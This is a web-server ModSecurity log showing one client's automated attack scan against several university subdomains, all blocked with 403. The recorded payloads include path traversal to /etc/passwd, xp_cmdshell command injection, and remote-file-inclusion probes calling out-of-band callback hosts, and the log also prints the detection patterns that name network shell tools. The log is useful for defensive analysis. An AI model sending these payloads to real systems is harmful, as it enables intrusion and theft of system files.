[Tue Aug 29 11:45:31.418062 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAh4DZsAAAA2"]
[Tue Aug 29 11:45:31.456351 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1368Co-f0AAAhxwogAAAAv"]
[Tue Aug 29 11:45:32.417796 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO137MCo-f0AAAh7wu0AAAA5"]
[Tue Aug 29 11:45:32.427042 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO137MCo-f0AAARphMUAAAAU"]
[Tue Aug 29 11:45:32.544885 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log/view"] [unique_id "ZO137MCo-f0AAAfSWk4AAAAB"]
[Tue Aug 29 11:45:33.413850 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO137cCo-f0AAAhkLg4AAAAh"]
[Tue Aug 29 11:45:35.125402 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1378Co-f0AAAh7wvAAAAA5"]
[Tue Aug 29 11:45:35.388391 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1378Co-f0AAAhlz6AAAAAi"]
[Tue Aug 29 11:45:35.447649 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAh7wvQAAAA5"]
[Tue Aug 29 11:45:35.452151 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAcsLYEAAAAE"]
[Tue Aug 29 11:45:35.462652 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAh13yEAAAAz"]
[Tue Aug 29 11:45:35.479127 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhBSB0AAAAX"]
[Tue Aug 29 11:45:35.518823 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAh7wvcAAAA5"]
[Tue Aug 29 11:45:36.443544 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5rwAAAAA"]
[Tue Aug 29 11:45:36.463842 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4DagAAAA2"]
[Tue Aug 29 11:45:36.516097 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4DakAAAA2"]
[Tue Aug 29 11:45:36.555342 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4DasAAAA2"]
[Tue Aug 29 11:45:36.638375 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5sQAAAAA"]
[Tue Aug 29 11:45:37.459049 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138cCo-f0AAAcsLYkAAAAE"]
[Tue Aug 29 11:45:38.534117 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138sCo-f0AAAhT3zcAAAAD"]
[Tue Aug 29 11:45:43.639371 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gawc1bns34qinb.oast.site found within TX:1: cjmnbitjmimt14dgn26gawc1bns34qinb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAfiYxoAAAAg"]
[Tue Aug 29 11:45:43.667395 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g8fgqg7dnoci7s.oast.site found within TX:1: cjmnbitjmimt14dgn26g8fgqg7dnoci7s.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAfiYxsAAAAg"]
[Tue Aug 29 11:45:43.957741 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g79yohi7h4tuhr.oast.site found within TX:1: cjmnbitjmimt14dgn26g79yohi7h4tuhr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAhT30sAAAAD"]
[Tue Aug 29 11:45:43.967123 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gt1h5a57a58g51.oast.site found within TX:1: cjmnbitjmimt14dgn26gt1h5a57a58g51.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAipS18AAAAF"]
[Tue Aug 29 11:45:43.970986 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gh1bpq8r3etdgo.oast.site found within TX:1: cjmnbitjmimt14dgn26gh1bpq8r3etdgo.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAg-pQ0AAAAR"]
[Tue Aug 29 11:45:44.771023 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ghrxaytdiat3r1.oast.site found within TX:1: cjmnbitjmimt14dgn26ghrxaytdiat3r1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO13@MCo-f0AAAhzvdEAAAAx"]
[Tue Aug 29 11:45:47.457697 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAiv-x8AAAAJ"]
[Tue Aug 29 11:45:47.460232 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAfSWmYAAAAB"]
[Tue Aug 29 11:45:47.466314 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhui1QAAAAr"]
[Tue Aug 29 11:45:47.479545 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAiv-yAAAAAJ"]
[Tue Aug 29 11:45:47.572638 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAiv-yMAAAAJ"]
[Tue Aug 29 11:45:48.440561 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13-MCo-f0AAAdxUmwAAAAC"]
[Tue Aug 29 11:45:48.549475 2023] [:error] [pid 2229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi1yTQAAAAM"]
[Tue Aug 29 11:45:48.558668 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAhlz7cAAAAi"]
